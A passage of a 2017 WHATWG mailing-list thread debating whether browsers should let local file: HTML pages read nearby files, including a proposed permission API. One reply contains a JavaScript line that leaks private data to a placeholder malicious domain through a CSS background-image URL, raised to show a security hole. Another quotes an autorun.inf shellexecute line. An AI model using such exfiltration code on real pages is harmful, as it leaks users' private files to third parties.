internet access.
If you really want a private HTML-based application, you might consider
a password-protected webpage. If the application isn't a throwaway app,
you'll want to do that anyway, so there isn't anything lost from the
upkeep required of maintaining an online server.
Why would I even want to run a server?
Domenic Denicola
2017-04-11 16:01:35 UTC
Permalink
I can't see this being addressed. The only good reason to distribute an application this way is because you want it to be confidential and there's no incentive to accommodate what one might call "walled gardens"
in HTML because they naturally have a limited audience.

Bingo. This mailing list is for developing technology for the world wide web, not for peoples' local computers.

You can use the same technology that people use on the web for local app development---many people do, e.g. Apache Cordova, Microsoft's Metro/Modern/UWP apps, or GitHub's Electron. But all those technologies are outside the standards process, and in general are not the focus of browser vendors in developing their products (which are, like the standards process, focused on the web
Philipp Serafin
2017-04-11 16:44:03 UTC
Permalink
Post by Domenic Denicola
Bingo. This mailing list is for developing technology for the world wide
web, not for peoples' local computers.
Doesn't that somewhat clash with the recent push to offline web apps and
the expectation/hope that pure HTML/JS/CSS might at some point be a
suitable replacement for native apps?
David Kendal
2017-04-11 16:46:57 UTC
Permalink
Post by Domenic Denicola
Bingo. This mailing list is for developing technology for the world
wide web, not for peoples' local computers.
The World Wide Web includes peoples' own computers. file:// is a URI
scheme for exactly that reason. Every browser since WorldWideWeb.app
for the NeXT has supported it, and every browser will support it
forever, I hope. (Until it gets the <ISINDEX> treatment, I suppose,
since the current generation of web standards writers seem to regard
the idea of platform stability with extreme contempt.)

You cannot escape this simply by redefining what you consider 'the web'
to be.

(file:// is even 'world wide', to some extent. On computers with AFS
installed, all URIs beginning with file:///afs/ will always resolve to
the exact same files.)
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
If one meets a powerful person […] one can ask five questions: what
power do you have; where did you get it; in whose interests do you
exercise it; to whom are you accountable; and, how can we get rid of
you? Anyone who cannot answer the last of those questions does not
live in a democratic system. — Tony Benn, Commons deb., 16 Nov. 1998
Patrick Dark
2017-04-11 18:50:12 UTC
Permalink
Post by David Kendal
Post by Domenic Denicola
Bingo. This mailing list is for developing technology for the world
wide web, not for peoples' local computers.
The World Wide Web includes peoples' own computers. file:// is a URI
scheme for exactly that reason. Every browser since WorldWideWeb.app
for the NeXT has supported it, and every browser will support it
forever, I hope. (Until it gets the <ISINDEX> treatment, I suppose,
since the current generation of web standards writers seem to regard
the idea of platform stability with extreme contempt.)
You cannot escape this simply by redefining what you consider 'the web'
to be.
(file:// is even 'world wide', to some extent. On computers with AFS
installed, all URIs beginning with file:///afs/ will always resolve to
the exact same files.)
The "world wide web" is the user-facing portion of the Internet. Files
on a CD or USB drive are not part of that.
Delfi Ramirez
2017-04-12 01:23:14 UTC
Permalink
Dear all:

I agree with the need to consider file:// ( or at least re-consider the
missing functionality) applicable to exec files / directories with HTML
documents, stored on physical devices ( like USBs or CD-DVDs), even it
might sound uselessness in the _cloudy_ times we live.

This HTML docs MUST be viewable using a modern browser and listening to
DOM events.

This required or proposed functionality ACCOMPLISHES well according to
standards, in the following scenarios:

If the HTML document (static or don't ) links to any other docs
published at the WWW, ( as it was usual in DVDs and CDs from the ages of
the multimedia hype), like videos or external sites.

Accessibility for earth places where you or the receiver needs to
storage and view HTML content, and where a direct connection speed may
not be as we know (_ It comes to mind a friend who just came back from
her NGO's mission not far away from our places -- the term 'slow
connection' becomes there an euphemism_ ).

Just mumbling , if it means for the goals.

Kind Regards

###########################

Note on Patrick's et al: WWW is a protocol for the HTTP (S) via TCP/IP

* _USB storage devices: fdisk, mkfs, mount/umount, file operations,
play a DVD movie and record a DVD-R media._
* _USB keyboards and USB mice._
* _USB webcams and USB speakers._
* _USB printers, USB scanners, USB serial converters and USB Ethernet
interfaces_...

A GENERAL USB DEVICE SHARING SYSTEM OVER IP NETWORK ACCOMPLISH THE WWW
PROTOCOL.

---

Delfi Ramirez -- At Work

My digital signature [1]

0034 633 589231
***@segonquart.net [2]

twitter: @delfinramirez [3]
IRC: segonquart
Skype: segonquart [4]

http://segonquart.net

http://delfiramirez.info
[5]
Post by Domenic Denicola
Bingo. This mailing list is for developing technology for the world
wide web, not for peoples' local computers. The World Wide Web includes peoples' own computers. file:// is a URI
scheme for exactly that reason. Every browser since WorldWideWeb.app
for the NeXT has supported it, and every browser will support it
forever, I hope. (Until it gets the <ISINDEX> treatment, I suppose,
since the current generation of web standards writers seem to regard
the idea of platform stability with extreme contempt.)
You cannot escape this simply by redefining what you consider 'the web'
to be.
(file:// is even 'world wide', to some extent. On computers with AFS
installed, all URIs beginning with file:///afs/ will always resolve to
the exact same files.)
The "world wide web" is the user-facing portion of the Internet. Files
on a CD or USB drive are not part of that.



Links:
------
[1] http://delfiramirez.info/public/dr_public_key.asc
[2] mail:%***@segonquart.net
[3] https://twitter.com/delfinramirez
[4] skype:segonquart
[5] http://delfiramirez.info
David Kendal
2017-04-14 16:58:01 UTC
Permalink
Post by Patrick Dark
The "world wide web" is the user-facing portion of the Internet. Files
on a CD or USB drive are not part of that.
You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.

If you can't take my word for it, how about the inventor of the
web itself? <https://gitter.im/solid/chat?at=58ed246d408f90be66aeeb30>
(Thanks to a correspondent, who I presume prefers to remain unnamed,
for sending this to me off-list.)

As the divinely-appointed guardians of the HTML spec, the responsibility
of the WHAT WG is to ensure that HTML is a useful platform for documents
and applications wherever HTML files can be opened from, whether that's
HTTP(S), FTP, or local files. Where 'the web' starts and stops in this
spectrum of possible protocols is of no import.

On that note I also see that the Fetch API has stubbed out the
specification of file: and ftp: URL semantics for definition in the
future at <https://fetch.spec.whatwg.org/#basic-fetch>.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
In politics, obedience and support are the same thing.
— Hannah Arendt
Domenic Denicola
2017-04-14 17:30:29 UTC
Permalink
Post by David Kendal
You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.
I don't intend to take direction on how I spend my time from you. I'd be curious as to whether you can find any statement of the WHATWG's responsibilities to back up your claim on my time.
Post by David Kendal
On that note I also see that the Fetch API has stubbed out the specification
of file: and ftp: URL semantics for definition in the future at
<https://fetch.spec.whatwg.org/#basic-fetch>.
That's not an accurate statement. Rather, Anne has left that as implementation-defined, since it isn't part
David Kendal
2017-04-14 17:48:17 UTC
Permalink
Post by Domenic Denicola
Post by David Kendal
You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.
I don't intend to take direction on how I spend my time from you.
Fine; you don't personally have to work on solving this problem, then.
But so far your response to my "I have a problem!" has been to say "you
are incorrect for having that problem" which is not a valuable use of
anybody's time or attention. You are more than welcome to ignore the
problem entirely and leave it up to other WHAT WG participants, several
of whom have expressed interest in working on this (though I trust that
if the outcome is changes or additions to the spec, that your employer
will faithfully implement them in its browser).
Post by Domenic Denicola
I'd be curious as to whether you can find any statement of the
WHATWG's responsibilities to back up your claim on my time.
This is getting silly. <https://wiki.whatwg.org/wiki/FAQ#The_WHATWG>
says the WHAT WG's purpose is to 'evolve the Web'; since file: URIs
are part of the web, this problem falls within the WHAT WG's remit.

If you continue with this argument, I will simply ignore you. I am more
interested in debating how to solve the problem than quibbling over who
should solve it.
Post by Domenic Denicola
Post by David Kendal
On that note I also see that the Fetch API has stubbed out the
specification of file: and ftp: URL semantics for definition in the
future at <https://fetch.spec.whatwg.org/#basic-fetch>.
That's not an accurate statement. Rather, Anne has left that as
implementation-defined, since it isn't part of the interoperable world
wide web.
The wording "For now, unfortunate as it is" introducing that section
sure sounds to me like this is something that is intended to be
addressed by the spec at a later date. Indeed, at the top of this thread
I proposed one step towards doing that.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
The Art of Biography +49 159 03847809
is different from Geography.
Geography is about Maps, — Edmund Clerihew Bentley,
but Biography is about Chaps. Biography for Beginners (1905)
Domenic Denicola
2017-04-14 18:09:55 UTC
Permalink
Post by David Kendal
This is getting silly. <https://wiki.whatwg.org/wiki/FAQ#The_WHATWG>
says the WHAT WG's purpose is to 'evolve the Web'; since file: URIs are part
of the web, this problem falls within the WHAT WG's remit.
file: URLs are part of the web, e.g. parsing such URLs when used in <a> tags, just like gopher: URLs or mailto: URLs. The behavior once navigating to file: URLs (or gopher: URLs, or mailto: URLs) is off the web, and outside the scope of the WHATWG's work.
Post by David Kendal
If you continue with this argument, I will simply ignore you. I am more
interested in debating how to solve the problem than quibbling over who
should solve it.
Please do so. I'm just stating the WHATWG's position on this for the clarity of other participants of this list; I would certainly prefer that you do not engage furthe
duanyao
2017-04-17 12:54:05 UTC
Permalink
Post by Domenic Denicola
Post by David Kendal
This is getting silly. <https://wiki.whatwg.org/wiki/FAQ#The_WHATWG>
says the WHAT WG's purpose is to 'evolve the Web'; since file: URIs are part
of the web, this problem falls within the WHAT WG's remit.
file: URLs are part of the web, e.g. parsing such URLs when used in <a> tags, just like gopher: URLs or mailto: URLs. The behavior once navigating to file: URLs (or gopher: URLs, or mailto: URLs) is off the web, and outside the scope of the WHATWG's work.
This still doesn't explain why file: protocol CAN'T be part of the web
(and inside the the scope of WHATWG).
No one is asking for web over gopher or ftp because http is a better
alternative; No one is asking for web over
mailto: because it is not a protocol for transporting data. But many
pepople are asking for web over file:
protocol because (1) file: protocol shares a lot of charaters with http,
which makes them believe that web can
work reasonably well over it -- with some effort. (2) http can't cover
some use cases of file: protocol, and they
believe these use cases are important.

The argument that http: is for "open" or "world wide" contents and
file: is for "walled gardens" is rather weak.
So many softwares on linux ship manuals in html format, and they are
open and world wide. People can also
distribute html files via ed2k or bittorrent, and they are open and
world wide. In contrast, iCloud, Google Drive,
and OneDrive are private by default, although http and web technologies
are used.
Post by Domenic Denicola
Post by David Kendal
If you continue with this argument, I will simply ignore you. I am more
interested in debating how to solve the problem than quibbling over who
should solve it.
Please do so. I'm just stating the WHATWG's position on this for the clarity of other participants of this list; I would certainly prefer that you do not engage further in attempting to redefine the WHATWG's scope.
Anne van Kesteren
2017-04-17 13:04:24 UTC
Permalink
Post by Domenic Denicola
file: URLs are part of the web, e.g. parsing such URLs when used in <a>
tags, just like gopher: URLs or mailto: URLs. The behavior once navigating
to file: URLs (or gopher: URLs, or mailto: URLs) is off the web, and outside
the scope of the WHATWG's work.
This still doesn't explain why file: protocol CAN'T be part of the web (and
inside the the scope of WHATWG).
Because it's a mechanism for addressing resources on a specific OS.
It's not a mechanism for addressing resources on the web.
--
https://annevankesteren.nl/
duanyao
2017-04-17 13:32:43 UTC
Permalink
Post by Anne van Kesteren
Post by Domenic Denicola
file: URLs are part of the web, e.g. parsing such URLs when used in <a>
tags, just like gopher: URLs or mailto: URLs. The behavior once navigating
to file: URLs (or gopher: URLs, or mailto: URLs) is off the web, and outside
the scope of the WHATWG's work.
This still doesn't explain why file: protocol CAN'T be part of the web (and
inside the the scope of WHATWG).
Because it's a mechanism for addressing resources on a specific OS.
It's not a mechanism for addressing resources on the web.
So you mean file: protocol is not portable? For absolute file: url,
true; for relative url, almost not true.

When writing web pages, no one use absolute file: urls in practice, so
this is a non-issue.
Anne van Kesteren
2017-04-17 13:39:11 UTC
Permalink
So you mean file: protocol is not portable? For absolute file: url, true;
for relative url, almost not true.
When writing web pages, no one use absolute file: urls in practice, so this
is a non-issue.
Neither is portable or part of the web, since you don't allocate
resources on someone else their machine that way. (And even in the
sense that you mean it, they're not portable due to the different
styles of matching, case-insensitive, Unicode normalization, custom
variants of Unicode normalization, bytes vs code points, etc.)
--
https://annevankesteren.nl/
duanyao
2017-04-17 15:53:32 UTC
Permalink
Post by Anne van Kesteren
So you mean file: protocol is not portable? For absolute file: url, true;
for relative url, almost not true.
When writing web pages, no one use absolute file: urls in practice, so this
is a non-issue.
Neither is portable or part of the web, since you don't allocate
resources on someone else their machine that way. (And even in the
sense that you mean it, they're not portable due to the different
styles of matching, case-insensitive, Unicode normalization, custom
variants of Unicode normalization, bytes vs code points, etc.)
When we want to write a web application portable across multiple server
OSes, these issues could

happen too. The rules of thumb are (1) assume case-sensitive but don't
create file names which differ

only in casing. (2) avoid characters subject to unicode normalization in
file names.


I think "portable" is never absolute. There are always incompatibilities
between browsers, and even

once standardized feature can be deprecated/removed in future, e.g.
`window.showModalDialog()`,

`<applet>` and `<keygen>`.
Anne van Kesteren
2017-04-17 16:03:23 UTC
Permalink
Post by duanyao
When we want to write a web application portable across multiple server
OSes, these issues could happen too.
Yes, but then you run into implementation bugs. Which are a very
different category from proprietary OS design decisions.
Post by duanyao
I think "portable" is never absolute.
Sure, but at least that's the goal for those participating in the
non-proprietary web ecosystem.
Post by duanyao
There are always incompatibilities
between browsers, and even once standardized feature can be
deprecated/removed in future, e.g. `window.showModalDialog()`,
`<applet>` and `<keygen>`.
This happens rarely and when it happens it's a very considered
decision involving lots of people. It's usually related to complexity,
lack of use, and security.
--
https://annevankesteren.nl/
duanyao
2017-04-17 17:19:31 UTC
Permalink
Post by Anne van Kesteren
Post by duanyao
When we want to write a web application portable across multiple server
OSes, these issues could happen too.
Yes, but then you run into implementation bugs. Which are a very
different category from proprietary OS design decisions.
I'm not sure the meaning of "implementation bugs" -- the bug of the web
application or the server OSes?

It seems you imply that "OS design decisions" are arbitray or unstable
over time, which is not qutie true.
As to filesystems' semantics, all major OSes are very stable in last
decades and unlikely to diverge dramatically
in the next decade. Apple's HFS+ normalizes unicodes, but the newer APFS
doesn't,
which is converging to other OSes.
Post by Anne van Kesteren
Post by duanyao
I think "portable" is never absolute.
Sure, but at least that's the goal for those participating in the
non-proprietary web ecosystem.
I think you overstate the proprietariness of filesystems' semantics.
Developers and users make
use of local html files (in cross-platform manner) for decades and
generally feel positive. Please
Don't ignore this.
Post by Anne van Kesteren
Post by duanyao
There are always incompatibilities
between browsers, and even once standardized feature can be
deprecated/removed in future, e.g. `window.showModalDialog()`,
`<applet>` and `<keygen>`.
This happens rarely and when it happens it's a very considered
decision involving lots of people. It's usually related to complexity,
lack of use, and security.
Sure. Proprietary OSes don't change thier core API in incompatibe way
for no good reason, too.

I don't expect a local web app tested on major OSes today would stop to
work tomorrow due to a filesystem API change.
Anne van Kesteren
2017-04-18 08:08:15 UTC
Permalink
Searching Google for "offline webapp discussion group" turns up
https://www.w3.org/wiki/Offline_web_applications_workshop
and that's sadly from 2011.
There is https://www.w3.org/TR/offline-webapps/
Right, those are about making applications distributed over HTTPS work
when the user is not connected. That idea doesn't necessitate file
URLs and we're still working towards that ideal with Fetch, HTML, and
Service Workers. All browsers seem on board with that general idea
too, which is great.
Now I know that WHATWG and W3 Working Group is not the same thing,
but if W3C thinks that offline apps are part of the web but WHATWG does not
then that creates a huge chasm as WHATWG would then ignore all offline
stuff.
The WHATWG collaborates with a W3C group on service workers. WHATWG
ends up being responsible for the underpinnings defined in Fetch and
HTML.
I always assumed that WHATWG was a fast track variant of W3C. Brainstorming
stuff, getting it tested/used in browsers then seeing what sticks to the
wall and once things become stable the W3C will hammer it in stone. Is that
assumption wrong?
A bit, they're more independent than that. (And we don't really
appreciate any copying that takes place. It's a lot less as of late,
but it still happens, as documented in e.g.,
https://annevankesteren.nl/2016/01/film-at-11 and
https://wiki.whatwg.org/wiki/Fork_tracking.)
--
https://annevankesteren.nl/
Anne van Kesteren
2017-04-18 08:38:28 UTC
Permalink
Post by Anne van Kesteren
Right, those are about making applications distributed over HTTPS work
when the user is not connected. That idea doesn't necessitate file
URLs and we're still working towards that ideal with Fetch, HTML, and
Service Workers. All browsers seem on board with that general idea
too, which is great.
But being able to access files added to a "subfolder" of said offline app
won't be possible I assume?
I'm not sure what that means. But you can still interact with the app
and do things with it, including storing data if the app allows such a
thing.
Maybe just adding the ability to ask the user if accessing this or that file
or this and that folder for indexing (and accessing the files within) would
be better.
There's <input type=file> and https://wicg.github.io/entries-api/.
Does the WHATWG and W3C meet/have a common group at all? (for the editors)
So that cross-group messes can be handled/avoided?
Well, we talk now and then and that has resulted in some improvements,
but it's also still ongoing and some within the W3C actively try to
make it worse (e.g., DOM is being forked again without a good reason).
So, nothing good thus far.
--
https://annevankesteren.nl/
duanyao
2017-04-18 10:35:26 UTC
Permalink
Post by Anne van Kesteren
Searching Google for "offline webapp discussion group" turns up
https://www.w3.org/wiki/Offline_web_applications_workshop
and that's sadly from 2011.
There is https://www.w3.org/TR/offline-webapps/
Right, those are about making applications distributed over HTTPS work
when the user is not connected. That idea doesn't necessitate file
URLs and we're still working towards that ideal with Fetch, HTML, and
Service Workers. All browsers seem on board with that general idea
too, which is great.
Offline webapp is great, but I'd say that offline webapp is "an online
web app that can work offline temporarily",
not really a local web app. If the entity operating an offline webapp
goes out of service permanently, the webapp
will stop to work soon. This is one of the reasones why local web app is
still relevant.
Delfi Ramirez
2017-04-14 17:35:20 UTC
Permalink
Hi all:

Agreed, David

Thank you very uch for pointing us to the URL

https://fetch.spec.whatwg.org/#basic-fetch

BTW: It's not our mission to discourage users ( netters) to --ehem --
use a modern browser featured in her/his personal device for personal
purposes ( as it is the exercise to access internal HTML files, linked
internally or externally either to JSON data, text data --uh that old
CDROMs -- or another linked HTML files -- CSS and jS comes to mind here
-- ).

This discouragement, seems quite the opposite as what is defined in the
spec

"_For now, unfortunate as it is, file and ftp URLs [6]__ are left as an
exercise for the reader._"

Just mumbling. Cheers.

---

Delfi Ramirez -- At Work

My digital signature [1]

0034 633 589231
***@segonquart.net [2]

twitter: @delfinramirez [3]
IRC: segonquart
Skype: segonquart [4]

http://segonquart.net

http://delfiramirez.info
[5]
Post by David Kendal
Post by Patrick Dark
The "world wide web" is the user-facing portion of the Internet. Files
on a CD or USB drive are not part of that.
You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.
If you can't take my word for it, how about the inventor of the
web itself? <https://gitter.im/solid/chat?at=58ed246d408f90be66aeeb30>
(Thanks to a correspondent, who I presume prefers to remain unnamed,
for sending this to me off-list.)
As the divinely-appointed guardians of the HTML spec, the responsibility
of the WHAT WG is to ensure that HTML is a useful platform for documents
and applications wherever HTML files can be opened from, whether that's
HTTP(S), FTP, or local files. Where 'the web' starts and stops in this
spectrum of possible protocols is of no import.
On that note I also see that the Fetch API has stubbed out the
specification of file: and ftp: URL semantics for definition in the
future at <https://fetch.spec.whatwg.org/#basic-fetch>.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
In politics, obedience and support are the same thing.
-- Hannah Arendt
Links:
------
[1] http://delfiramirez.info/public/dr_public_key.asc
[2] mail:%***@segonquart.net
[3] https://twitter.com/delfinramirez
[4] skype:segonquart
[5] http://delfiramirez.info
[6] https://url.spec.whatwg.org/#concept-url
Patrick Dark
2017-04-14 18:45:51 UTC
Permalink
Post by David Kendal
Post by Patrick Dark
The "world wide web" is the user-facing portion of the Internet. Files
on a CD or USB drive are not part of that.
You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.
If you can't take my word for it, how about the inventor of the
web itself? <https://gitter.im/solid/chat?at=58ed246d408f90be66aeeb30>
(Thanks to a correspondent, who I presume prefers to remain unnamed,
for sending this to me off-list.)
"Appeal to authority" is a logical fallacy. An authoritative source
doesn't make an argument true.

I disagree with the idea that HTML files on offline media or a closed
intranet are part of the "world wide web".
Delfi Ramirez
2017-04-14 20:39:29 UTC
Permalink
Dera Patrick, Dear David , dearest all:

Nowadays, there is an agreement this may become an sterile debate, if
the issue is that there is no time to invest, neither and agreement on
what should be done.

I propose, if there is any interest on the matter we are arguing, to
open a branch, and those of us who have the will, who see the need, and
dispose of some spare time to invest in a possible solution ( to be
presented in a future as an enhancement or a recommendation), put our
hands to work.

Count me in, _if there is a small group of devoted volunteers who want
to extend or put his hands dirt as an __exercise,_ for file and ftp
URLs [6 [6]] in the fetch spec featured in WHATWG.

Sundays I'm on.

Regards

---

Delfi Ramirez -- At Work

My digital signature [1]

0034 633 589231
***@segonquart.net [2]

twitter: @delfinramirez [3]
IRC: segonquart
Skype: segonquart [4]

http://segonquart.net

http://delfiramirez.info
[5]
Post by Patrick Dark
The "world wide web" is the user-facing portion of the Internet. Files
on a CD or USB drive are not part of that. You are continuing to dodge this problem by redefining the WHAT WG's
responsibilities. Please don't do that.
If you can't take my word for it, how about the inventor of the
web itself? <https://gitter.im/solid/chat?at=58ed246d408f90be66aeeb30>
(Thanks to a correspondent, who I presume prefers to remain unnamed,
for sending this to me off-list.)
"Appeal to authority" is a logical fallacy. An authoritative source
doesn't make an argument true.

I disagree with the idea that HTML files on offline media or a closed
intranet are part of the "world wide web".



Links:
------
[1] http://delfiramirez.info/public/dr_public_key.asc
[2] mail:%***@segonquart.net
[3] https://twitter.com/delfinramirez
[4] skype:segonquart
[5] http://delfiramirez.info
[6] https://url.spec.whatwg.org/#concept-url
Delfi Ramirez
2017-04-12 11:03:57 UTC
Permalink
David: Agreed.

Shall we start to think on the native modern browsers, desktops ( which
are integrated with the DOM, as much as I have perceived ) TouchScreen,
connected to the web, and ASF or other networks (IoT comes to mind) ?

A modern DOM update version of the known trick

[autorun]
shellexecute=path\to\htmlfile.html

will be of use.

Kind regards

---

Delfi Ramirez -- At Work

My digital signature [1]

0034 633 589231
***@segonquart.net [2]

twitter: @delfinramirez [3]
IRC: segonquart
Skype: segonquart [4]

http://segonquart.net

http://delfiramirez.info
[5]
Post by David Kendal
Post by Domenic Denicola
Bingo. This mailing list is for developing technology for the world
wide web, not for peoples' local computers.
The World Wide Web includes peoples' own computers. file:// is a URI
scheme for exactly that reason. Every browser since WorldWideWeb.app
for the NeXT has supported it, and every browser will support it
forever, I hope. (Until it gets the <ISINDEX> treatment, I suppose,
since the current generation of web standards writers seem to regard
the idea of platform stability with extreme contempt.)
You cannot escape this simply by redefining what you consider 'the web'
to be.
(file:// is even 'world wide', to some extent. On computers with AFS
installed, all URIs beginning with file:///afs/ will always resolve to
the exact same files.)
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
If one meets a powerful person [...] one can ask five questions: what
power do you have; where did you get it; in whose interests do you
exercise it; to whom are you accountable; and, how can we get rid of
you? Anyone who cannot answer the last of those questions does not
live in a democratic system. -- Tony Benn, Commons deb., 16 Nov. 1998
Links:
------
[1] http://delfiramirez.info/public/dr_public_key.asc
[2] mail:%***@segonquart.net
[3] https://twitter.com/delfinramirez
[4] skype:segonquart
[5] http://delfiramirez.info
Melvin Carvalho
2017-04-11 16:47:14 UTC
Permalink
Post by Patrick Dark
I can't see this being addressed. The only good reason to distribute an
application this way is because you want it to be confidential and there's
no incentive to accommodate what one might call "walled gardens"
in HTML because they naturally have a limited audience.
Bingo. This mailing list is for developing technology for the world wide
web, not for peoples' local computers.
That is one perspective of the world wide web. But perhaps not a
perceptive shared by all.

Another view which I think is held by many, is that you should equally be
able to access public data on the web, data in the cloud and persona data
on your machine.
You can use the same technology that people use on the web for local app
development---many people do, e.g. Apache Cordova, Microsoft's
Metro/Modern/UWP apps, or GitHub's Electron. But all those technologies are
outside the standards process, and in general are not the focus of browser
vendors in developing their products (which are, like the standards
process, focused on the web). The same is true of file: URLs.
Yes, Im currently using Electron for this. But would much prefer to use
the browser. If there are browser have this restriction, I'd simply like a
way to turn it off. It's a heavily requested feature, why wouldnt an open
source browser not be a suitable target for such an improvement (and
thereby gain market share).
David Kendal
2017-04-11 16:42:05 UTC
Permalink
Post by Patrick Dark
I can't see this being addressed. The only good reason to distribute
an application this way is because you want it to be confidential and
there's no incentive to accommodate what one might call "walled
gardens" in HTML because they naturally have a limited audience. For
example, if your application is being distributed via CD, that implies
that that number of application instances will be limited to the
number of physical media items, that the application will never be
updated, and that the application therefore isn't particularly
important.
I object strongly to this inference.

Let's approach this problem from the other end. This is the problem I'm
actually trying to solve, and I've concluded that the web platform,
distributed on CD-ROM, may be the best approach. Please suggest another
way to distribute something which is:

(a) stable, as in won't disappear when the publisher dies or goes out of
business and stops paying hosting bills;
(b) archivable, as in won't degrade significantly over the medium term
when stored;
(c) portable, as in not tied to any particular API;
(d) forward-compatible, as in will very probably run on future computer
architectures and operating systems in the long term, regardless of
system call or GUI API changes.

I am genuinely asking for suggestions for a better approach. HTML files
on CD are *vital* for certain kinds of large ebooks to survive the ages.
But if you want to make them interactive, you're hamstrung by the lack
of cross-browser support for XHR/Fetch for files on the same medium.

Bundling an HTTP server on the disc would break (c) and (d), though one
could depend on the capabilities of future software archaeologists to
simply run their own servers for the content.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
The reason we had no idea how cats worked was because, since Newton,
we had proceeded by the simple principle that essentially, to see how
things work, we took them apart. If you try and take a cat apart to
see how it works, the first thing you have on your hands is a non-
working cat. — Douglas Adams
David Kendal
2017-04-14 21:43:09 UTC
Permalink
To set aside the previous thread, I'd like to make a renewed call for
input on my actual proposal, including counter-proposals, potential
flaws in my design, etc.

Then perhaps we can make some progress here.

dpk
Post by David Kendal
Moin,
Over the last few years there has been a gradual downgrading of support
in browsers for running pages from the file: protocol. Most browsers now
have restrictions on the ability of JavaScript in such pages to access
other files.
Both Firefox and Chrome seem to have removed this support from XHR, and
there appears to be no support at all for Fetching local files from
other local files. This is an understandable security restriction, but
there is no viable replacement at present.
This is a shame because there are many possible uses for local static
files accessing other local static files: the one I have in mind is
shipping static files on CD-ROM or USB stick, but there is also the more
obvious (and probably more common) use of local files by developers
prototyping their apps before deploying them live to an HTTP server.
This is an inconvenience to many web developers, and I'm far from the
only one to complain about it. For instance, this from a very prolific
I've filed hundreds of Chrome bugs and I would rather would see this
fixed than any of them
in <https://bugs.chromium.org/p/chromium/issues/detail?id=47416>. That
bug was the number two most starred Blink bug in 2016.
I'd like to see APIs that solve this problem securely, in a way that's
portable across all browsers. I know this isn't trendy or sexy but
'single-page apps' are still in vogue (I think?) and it would be
useful/cool to be able to run them locally, even only for development
purposes.
window.requestFilesystemPermission(requestedOrigin);
which does something like
- If permission was already granted for the specified requestedOrigin or
some parent directory of it, return true.
- If the current page origin is not a URL on the file: protocol, raise a
permissions error.
- If requestedOrigin does not share a root path with the current page
origin, raise a permissions error. That is, a file with the name
file:///mnt/html/index.html can request access to file:///mnt or to
file:///mnt/html, but *not* to file:///etc, where it could read the
local password file.
- The browser displays an alert to the page user showing the name and
path to the directory which has requested this permission. The user
can then choose to allow or deny access.
- If the user chose not to allow access to the files, false is returned
or some other error is raised.
- If they chose to allow access, return true.
- For the remainder of the session (user agent specific), all files
in the requestedOrigin directory, including the current page, have
total read access (with Fetch, XHR, etc.) to all other files in
the directory.
requestedOrigin is allowed to be an absolute or relative URI.
Some useful Fetch semantics for file: URLs should also be defined.
I like this solution because it maintains portability of scripts between
HTTP(S) and local files without too much extra programming work: if
scripts only request relative URLs, they can both (a) detect that
they're running locally from file: URLs, and request permission if so
and (b) detect that they're running on HTTP, and make exactly the same
API calls as they would on the local system.
This is also a beneficial property for those using file:// URLs for
development purposes.
Of course, this is just one solution that's possible. I would welcome
feedback on this proposal and any progress towards any solution to this
very common problem.
Thanks,
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
<+grr> for security reasons I've switched to files:// urls instead
Patrick Dark
2017-04-15 00:09:41 UTC
Permalink
Post by David Kendal
window.requestFilesystemPermission(requestedOrigin);
which does something like
- If permission was already granted for the specified requestedOrigin or
some parent directory of it, return true.
- If the current page origin is not a URL on the file: protocol, raise a
permissions error.
- If requestedOrigin does not share a root path with the current page
origin, raise a permissions error. That is, a file with the name
file:///mnt/html/index.html can request access to file:///mnt or to
file:///mnt/html, but *not* to file:///etc, where it could read the
local password file.
- The browser displays an alert to the page user showing the name and
path to the directory which has requested this permission. The user
can then choose to allow or deny access.
- If the user chose not to allow access to the files, false is returned
or some other error is raised.
- If they chose to allow access, return true.
- For the remainder of the session (user agent specific), all files
in the requestedOrigin directory, including the current page, have
total read access (with Fetch, XHR, etc.) to all other files in
the directory.
So if you put this file in the Windows Downloads directory, then it has
read access to all download files even though they aren't related? And
it grants access to all of those files—some of which may also be
HTML-based applications—again, even if they aren't related? If the user
is instructed to place it in the root directory and then grants it
permissions, it has access to read the entire operating system?

What if the file is used to dynamically write a CSS style declaration as in:

some_element.style.setProperty("background-image",
"url('http://maliciousdomain.com/?private-info=" + private_info + "')");

How do you address this security hole?
David Kendal
2017-04-15 09:58:57 UTC
Permalink
Post by Patrick Dark
So if you put this file in the Windows Downloads directory, then it
has read access to all download files even though they aren't related?
And it grants access to all of those files—some of which may also be
HTML-based applications—again, even if they aren't related? If the
user is instructed to place it in the root directory and then grants
it permissions, it has access to read the entire operating system?
some_element.style.setProperty("background-image", "url('http://maliciousdomain.com/?private-info=" + private_info + "')");
How do you address this security hole?
Ah, well, that's why you have to ask the user. The prompt should make
clear that this is a possibility -- something like:

"The webpage ‘[title]’ wants to access files in the folder ‘[name]’.
The webpage will be able to open and read from, but not modify, all
the files in this folder and may be able to send information from those
files to third parties. You should not do this if you do not trust the
source of this webpage. Do you want to allow this?"
[or whatever -- I'm not a UI text writer and something shorter would
probably be better, it's up to browser makers]

Alternatively, the Right Thing might be to say that once you've got
local file access you can't load images, scripts (etc.) over HTTP. That
might be oppressively restrictive for the use case where developers are
using file URLs for development though (they might still want assets
like JS libraries from a CDN).

Basically, I'm willing to trust users to know that files running from
their local computer might affect other things on their local computer
-- especially when warned about it explicitly. After all, as others have
pointed out, the same vulnerability is there when you take the option of
shipping an HTTP server with the HTML files. And, in fact, it's worse
because the HTTP server has no sandboxing to a particular area of the
filesystem and *doesn't* generally warn the user before it gains total
filesystem access.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
we do these things not because they are easy, +49 159 03847809
but because we thought they were going to be easy
— ‘The Programmers’ Credo’, Maciej Cegłowski
Philipp Serafin
2017-04-15 13:09:54 UTC
Permalink
If I see this correctly, we're currently talking about two different
use-cases for file/directory access:

